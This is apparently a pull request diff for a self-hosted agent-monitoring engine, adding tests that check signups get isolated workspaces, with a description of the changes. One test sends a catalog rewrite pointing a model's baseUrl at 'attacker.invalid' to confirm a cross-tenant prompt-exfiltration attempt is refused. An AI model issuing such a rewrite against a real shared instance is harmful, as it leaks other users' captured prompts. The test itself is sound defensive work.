-async function signUp(email: string, password: string, name: string) {
-  const res = await engine.request("/api/v1/auth/sign-up/email", { ...json({ email, password, name }), apiKey: null });
+async function signUp(target: TestEngine, email: string, password: string, name: string) {
+  const res = await target.request("/api/v1/auth/sign-up/email", { ...json({ email, password, name }), apiKey: null });
   const body = await res.text();
   return { status: res.status, cookie: cookieHeader(res), body };
 }
 
-async function signIn(email: string, password: string) {
-  const res = await engine.request("/api/v1/auth/sign-in/email", { ...json({ email, password }), apiKey: null });
+async function signIn(target: TestEngine, email: string, password: string) {
+  const res = await target.request("/api/v1/auth/sign-in/email", { ...json({ email, password }), apiKey: null });
   const body = await res.text();
   return { status: res.status, cookie: cookieHeader(res), body };
 }
@@ -39,8 +41,18 @@ const asUser = (cookie: string, init: RequestInit = {}): RequestInit & { apiKey:
   headers: { ...(init.headers as Record<string, string> | undefined), cookie },
 });
 
+type WireProject = { _id: string; name: string; apiKey: string };
+
+async function projectsOf(target: TestEngine, cookie: string): Promise<WireProject[]> {
+  const res = await target.json("/api/v1/projects", asUser(cookie));
+  expect(res.status, JSON.stringify(res.body)).toBe(200);
+  return (res.body as { projects: WireProject[] }).projects;
+}
+
 let ownerCookie = "";
 let memberCookie = "";
+// The owner's own project key, reused by the cross-tenant checks below.
+let ownerProjectKey = "";
 
 beforeAll(async () => {
   engine = await startEngine({ AGENTX_AUTH: "enabled" });
@@ -54,7 +66,7 @@ describe("AGENTX_AUTH=enabled", () => {
   it("reports the mode and that setup is still pending", async () => {
     const config = await engine.json("/api/v1/auth/config", { apiKey: null });
     expect(config.status).toBe(200);
-    expect(config.body).toEqual({ mode: "enabled", needsSetup: true });
+    expect(config.body).toEqual({ mode: "enabled", needsSetup: true, tenancy: "isolated" });
   });
 
   it("has no anonymous API-key handout at all", async () => {
@@ -78,14 +90,21 @@ describe("AGENTX_AUTH=enabled", () => {
     }
   });
 
+  it("prints no project API key in the boot banner", async () => {
+    // Disabled mode prints the default project's key for the operator to copy. Here the log is not
+    // a private channel - `docker logs`, a pod log, or a log shipper would hand a working
+    // data-plane credential for the instance owner's project to anyone who can read it.
+    expect(engine.log()).not.toMatch(/agtx_local_/);
+  });
+
   it("makes the first signup the owner and hands it the pre-existing project", async () => {
-    const result = await signUp("owner@example.com", "correct-horse-battery", "Owner");
+    const result = await signUp(engine, "owner@example.com", "correct-horse-battery", "Owner");
     expect(result.status, result.body).toBeLessThan(300);
     expect(result.cookie, "no session cookie returned").toBeTruthy();
     ownerCookie = result.cookie;
 
     const config = await engine.json("/api/v1/auth/config", { apiKey: null });
-    expect(config.body).toEqual({ mode: "enabled", needsSetup: false });
+    expect(config.body).toEqual({ mode: "enabled", needsSetup: false, tenancy: "isolated" });
 
     // The project that existed before auth was turned on is claimed by the new org, rather than
     // being stranded with no owner and therefore invisible to everyone.
@@ -101,6 +120,7 @@ describe("AGENTX_AUTH=enabled", () => {
     const created = await engine.json("/api/v1/projects", asUser(ownerCookie, json({ name: "Team project" })));
     expect(created.status, JSON.stringify(created.body)).toBe(201);
     const key = (created.body as { project: { apiKey: string } }).project.apiKey;
+    ownerProjectKey = key;
 
     // The data plane never does a login flow - the project key alone is the SDK's credential, in
     // both auth modes.
@@ -125,16 +145,91 @@ describe("AGENTX_AUTH=enabled", () => {
     await res.text();
   });
 
-  it("joins a later signup to the same organization as a member", async () => {
-    const result = await signUp("member@example.com", "correct-horse-battery", "Member");
+  // The bug this suite previously PINNED as correct behaviour: every signup joined the first
+  // user's organization, so a second person on the same instance saw the first person's projects
+  // and, because the project list carries each project's key, could take over their data plane
+  // outright. Isolation is now the default, and these are the assertions that stop it regressing.
+  it("gives a later signup its own organization and none of the owner's projects", async () => {
+    const result = await signUp(engine, "member@example.com", "correct-horse-battery", "Member");
     expect(result.status, result.body).toBeLessThan(300);
     memberCookie = result.cookie;
 
-    const ownerProjects = await engine.json("/api/v1/projects", asUser(ownerCookie));
-    const memberProjects = await engine.json("/api/v1/projects", asUser(memberCookie));
-    expect(memberProjects.status).toBe(200);
-    const names = (body: unknown) => ((body as { projects: { name: string }[] }).projects ?? []).map(p => p.name).sort();
-    expect(names(memberProjects.body)).toEqual(names(ownerProjects.body));
+    const ownerProjects = await projectsOf(engine, ownerCookie);
+    const memberProjects = await projectsOf(engine, memberCookie);
+
+    // An org that owns nothing has no API key and nothing to do, so a fresh tenant is given a
+    // starter project of its own rather than an empty dashboard.
+    expect(memberProjects.length, "a new tenant got no starter project").toBeGreaterThan(0);
+
+    const ownerIds = new Set(ownerProjects.map(p => p._id));
+    const ownerKeys = new Set(ownerProjects.map(p => p.apiKey));
+    expect(memberProjects.filter(p => ownerIds.has(p._id))).toEqual([]);
+    expect(memberProjects.filter(p => ownerKeys.has(p.apiKey))).toEqual([]);
+
+    // ...and the reverse direction: the pre-existing project stays with the first signup only.
+    const memberIds = new Set(memberProjects.map(p => p._id));
+    expect(ownerProjects.filter(p => memberIds.has(p._id))).toEqual([]);
+    expect(ownerProjects.some(p => p.name === "Default")).toBe(true);
+  });
+
+  it("does not show one tenant another tenant's traces", async () => {
+    const memberKey = (await projectsOf(engine, memberCookie))[0]!.apiKey;
+    const listed = await engine.json("/api/v1/ingest/traces", { apiKey: memberKey });
+    expect(listed.status).toBe(200);
+    // "auth-mode-agent" was ingested above with the owner's key.
+    expect(JSON.stringify(listed.body)).not.toContain("auth-mode-agent");
+  });
+
+  it("lets only the instance owner rewrite the instance-wide provider keys", async () => {
+    const memberKey = (await projectsOf(engine, memberCookie))[0]!.apiKey;
+    const settingsPath = "/api/v1/agent-monitoring/settings/llm-keys";
+
+    // One shared app_settings row funds every tenant's judge calls, and this route authenticates
+    // with a project key rather than a session - so a second tenant holding a valid key of its own
+    // must still not be able to swap the credential out from under the first.
+    const denied = await engine.json(settingsPath, { ...put({ openaiApiKey: "sk-tenant-b" }), apiKey: memberKey });
+    expect(denied.status).toBe(403);
+
+    const allowed = await engine.json(settingsPath, { ...put({ openaiApiKey: "sk-instance-owner" }), apiKey: ownerProjectKey });
+    expect(allowed.status, JSON.stringify(allowed.body)).toBe(200);
+
+    // Leave the instance as we found it - a configured key changes what later boots try to call.
+    const cleared = await engine.json(settingsPath, { ...put({ openaiApiKey: "" }), apiKey: ownerProjectKey });
+    expect(cleared.status).toBe(200);
+    expect((cleared.body as { llm: { openai: { configured: boolean } } }).llm.openai.configured).toBe(false);
+  });
+
+  it("refuses a non-owner tenant's write to the shared model catalog", async () => {
+    const memberKey = (await projectsOf(engine, memberCookie))[0]!.apiKey;
+    const catalog = "/api/v1/agent-monitoring/portability/models";
+
+    const models = await engine.json(catalog, { apiKey: memberKey });
+    expect(models.status).toBe(200);
+    const target = (models.body as { models: { id: string; label: string }[] }).models[0]!;
+    expect(target, "no seeded portability models to test against").toBeTruthy();
+    const row = `${catalog}/${encodeURIComponent(target.id)}`;
+
+    // The catalog is instance-wide, and Model Portability replays a trace's input against whatever
+    // baseUrl a row names - so a second tenant rewriting one would exfiltrate the first tenant's
+    // captured prompts to an endpoint of its own choosing.
+    const hijack = await engine.json(row, {
+      ...put({
+        provider: "custom",
+        label: target.label,
+        pricePerMInputTokens: 0,
+        pricePerMOutputTokens: 0,
+        baseUrl: "http://attacker.invalid/v1",
+      }),
+      apiKey: memberKey,
+    });
+    expect(hijack.status).toBe(403);
+    expect((await engine.json(row, { method: "DELETE", apiKey: memberKey })).status).toBe(403);
+
+    // Nothing about the row moved.
+    const after = await engine.json(catalog, { apiKey: ownerProjectKey });
+    const survivor = (after.body as { models: { id: string; baseUrl: string | null }[] }).models.find(m => m.id === target.id);
+    expect(survivor).toBeTruthy();
+    expect(survivor!.baseUrl).toBeNull();
   });
 
   it("rejects a signed-out or forged cookie", async () => {
@@ -143,10 +238,10 @@ describe("AGENTX_AUTH=enabled", () => {
   });
 
   it("signs in an existing user and issues a working session", async () => {
-    const failed = await signIn("owner@example.com", "wrong-password");
+    const failed = await signIn(engine, "owner@example.com", "wrong-password");
     expect(failed.status).toBeGreaterThanOrEqual(400);
 
-    const ok = await signIn("owner@example.com", "correct-horse-battery");
+    const ok = await signIn(engine, "owner@example.com", "correct-horse-battery");
     expect(ok.status, ok.body).toBeLessThan(300);
     expect((await engine.json("/api/v1/projects", asUser(ok.cookie))).status).toBe(200);
   });
@@ -183,7 +278,7 @@ describe("AGENTX_AUTH=enabled", () => {
       expect(row.issuer).toBe(`local:${row.provider_id}`);
     }
 
-    const ok = await signIn("owner@example.com", "correct-horse-battery");
+    const ok = await signIn(engine, "owner@example.com", "correct-horse-battery");
     expect(ok.status, `existing user could not sign in after the upgrade: ${ok.body}`).toBeLessThan(300);
   }, 120_000);
 
@@ -196,10 +291,44 @@ describe("AGENTX_AUTH=enabled", () => {
   }, 120_000);
 });
 
+// The team-server posture, now something an operator asks for by name. Worth its own engine
+// because the two modes differ only in what the SECOND signup means, and that is exactly the kind
+// of branch that rots once the default stops exercising it.
+describe("AGENTX_AUTH=enabled with AGENTX_TENANCY=shared", () => {
+  let shared: TestEngine;
+
+  beforeAll(async () => {
+    shared = await startEngine({ AGENTX_AUTH: "enabled", AGENTX_TENANCY: "shared" });
+  }, 90_000);
+
+  afterAll(async () => {
+    await shared?.stop();
+  });
+
+  it("advertises the mode so the sign-up screen can describe what an account gets", async () => {
+    const config = await shared.json("/api/v1/auth/config", { apiKey: null });
+    expect(config.body).toEqual({ mode: "enabled", needsSetup: true, tenancy: "shared" });
+  });
+
+  it("joins a later signup to the first user's organization and its projects", async () => {
+    const first = await signUp(shared, "team-owner@example.com", "correct-horse-battery", "Team Owner");
+    expect(first.status, first.body).toBeLessThan(300);
+    const second = await signUp(shared, "team-mate@example.com", "correct-horse-battery", "Team Mate");
+    expect(second.status, second.body).toBeLessThan(300);
+
+    const ownerProjects = await projectsOf(shared, first.cookie);
+    const mateProjects = await projectsOf(shared, second.cookie);
+    const ids = (list: WireProject[]) => list.map(p => p._id).sort();
+    expect(ids(mateProjects)).toEqual(ids(ownerProjects));
+    expect(ownerProjects.some(p => p.name === "Default")).toBe(true);
+  }, 60_000);
+});
+
 // The auth tables live in both schema files and better-auth is handed a different adapter provider
 // per dialect, so "sign-up works" is a per-backend claim, not a global one.
 describe.skipIf(!postgresAvailable)("AGENTX_AUTH=enabled on Postgres", () => {
   let pgEngine: TestEngine;
+  let pgOwnerCookie = "";
 
   beforeAll(async () => {
     pgEngine = await startEngine({ AGENTX_AUTH: "enabled" }, { postgres: true });
@@ -218,9 +347,29 @@ describe.skipIf(!postgresAvailable)("AGENTX_AUTH=enabled on Postgres", () => {
     expect(res.status, body).toBeLessThan(300);
     const cookie = cookieHeader(res);
 
+    pgOwnerCookie = cookie;
+
     const projects = await pgEngine.json("/api/v1/projects", { apiKey: null, headers: { cookie } });
     expect(projects.status).toBe(200);
     expect((projects.body as { projects: unknown[] }).projects.length).toBeGreaterThan(0);
+  }, 60_000);
+
+  // The isolated path writes more per signup than the shared one does - a new organization, a
+  // member row, a project and its seeded evaluators - so "it works" is a per-dialect claim here
+  // for the same reason sign-up itself is.
+  it("gives a later signup its own organization and projects", async () => {
+    const res = await pgEngine.request("/api/v1/auth/sign-up/email", {
+      ...json({ email: "pg-second@example.com", password: "correct-horse-battery", name: "PG Second" }),
+      apiKey: null,
+    });
+    const body = await res.text();
+    expect(res.status, body).toBeLessThan(300);
+
+    const owner = await projectsOf(pgEngine, pgOwnerCookie);
+    const second = await projectsOf(pgEngine, cookieHeader(res));
+    expect(second.length).toBeGreaterThan(0);
+    const ownerIds = new Set(owner.map(p => p._id));
+    expect(second.filter(p => ownerIds.has(p._id))).toEqual([]);
   }, 60_000);
 
   it("still refuses anonymous access to keys", async () => {

--- a/k8s/configmap.yaml
+++ b/k8s/configmap.yaml
@@ -13,6 +13,9 @@ data:
   AGENTX_IMPROVEMENT_SWEEP: "true"
   AGENTX_SESSION_SWEEP: "true"
   AGENTX_AUTH: "disabled"
+  # Only read when AGENTX_AUTH is "enabled": "isolated" gives every signup its own organization
+  # and projects, "shared" puts every signup in the first user's organization.
+  AGENTX_TENANCY: "isolated"
   OPENAI_API_KEY: ""
   ANTHROPIC_API_KEY: ""
   GEMINI_API_KEY: ""

--- a/scripts/smoke_test.py
+++ b/scripts/smoke_test.py
@@ -78,9 +78,9 @@ def main() -> None:
     with client.tracer.trace("smoke-test-agent", monitor=True) as span2:
         span2.input = "do the thing"
         span2.output = "done, but a tool failed"
-        span2.tool_calls = [
-            {"name": "lookup_thing", "input": "x", "output": "error: timeout", "latency_ms": 50, "success": False}
-        ]
+        span2.add_tool_call(
+            "lookup_thing", input="x", output="error: timeout", success=False, error="timeout", latency_ms=50
+        )
 
     signal = None
     for _ in range(10):

--- a/scripts/smoke_test.py
+++ b/scripts/smoke_test.py
@@ -65,14 +65,15 @@ def main() -> None:
     ).execute(answer)
     ctx.finalize()
 
-    # ctx.average_rating (public) needs liveStatistics on the finalize response, which self-host
-    # doesn't compute yet (see engine/src/routes/evaluations.ts's scope note); GET /runs/:id
-    # (also not yet SDK-public, no list_runs()/get_run() beyond the internal client) is what this
-    # engine actually returns the average on, so that's what this test checks against instead.
+    # ctx.average_rating and friends read liveStatistics off the finalize response - this engine
+    # computes it (core/evaluate/runs.ts), so the public accessors are what a real user would read.
+    check("result scored", ctx.rated_count == 1)
+    check("correct answer scored highly", ctx.average_rating is not None and ctx.average_rating >= 8)
+
+    # Run status itself has no public accessor (no list_runs()/get_run() beyond the internal
+    # client), so this one still goes through GET /runs/:id.
     info = client.evaluations._client.get_run(ctx._run.run_id)
     check("run finalized", info["status"] == "completed")
-    check("result scored", info["resultCount"] == 1)
-    check("correct answer scored highly", info["averageRating"] is not None and info["averageRating"] >= 8)
 
     print("Monitor")
     with client.tracer.trace("smoke-test-agent", monitor=True) as span2:


### PR DESCRIPTION
Three commits, so this lands as one release.

## Per-signup workspaces

Every signup gets its own workspace unless told otherwise. See `CHANGELOG.md` and the new Multi-user setup section in the README. (Was #8.)

## Two claims about this engine that stopped being true

**Known gaps said Evaluate's whole-run analysis was out of scope.** It works — I ran `analyze_run`/`get_report` end to end against a booted engine and got a real report back. What's actually different from hosted is that it runs *synchronously* rather than as a durable queued job: `analyze` holds the request open until the judges finish, so the SDK's poll loop sees a terminal status on its first check. The bullet says that now.

**`scripts/smoke_test.py` said self-host doesn't compute `liveStatistics`,** and reached past the public API into `client.evaluations._client` to read an average. It does compute it (`core/evaluate/runs.ts`) — `ctx.average_rating` returned 10.0 — so the smoke test reads the public accessors a real caller would.

The SDK section also now names the calls that have **no route here** — `list_models()`, `evaluate_trace()`, and the CI-run surface behind `run_eval()` — so a self-host user finds them in the README rather than as a 404 mid-script. The SDK side of that is [AgentX-ai/AgentX-Python#20](https://github.com/AgentX-ai/AgentX-Python/pull/20), which makes those calls raise a typed `EndpointNotAvailable` instead of claiming the dataset is missing. Independent of this PR — merge in either order.

## Smoke test uses the public tool-call API

It was poking `span.tool_calls` directly to mark a failed call, because the span-level recorder couldn't express one. #20 fixes that; this uses it. (Was #10.)

> [!NOTE]
> That makes this depend on an SDK release: `scripts/smoke_test.py` deliberately runs against the published `agentx-python` package, and `add_tool_call(..., success=...)` doesn't exist in 0.6.28. `scripts/smoke-test.sh` needs #20 merged and released first. Nothing else here does — `yarn test` and the compiled-binary job are unaffected.

## One more thing

A comment on the startup banner's API key line explaining that it's logged deliberately, on the auth-disabled branch only. A CodeQL "clear-text logging" autofix removed it earlier in this PR's history and took ~15 integration suites and the compiled-binary job down with it — `test/server.ts`, `scripts/smoke-binary.sh`, `scripts/smoke-test.sh` and two README instructions all read the key from that line. The `AGENTX_AUTH=enabled` branch, where a logged credential would actually matter, prints none. Both alerts are dismissed with that rationale.

## Test plan

`yarn test` — 444 passed, 38 skipped (Postgres, opt-in), 0 failed. `yarn typecheck` clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)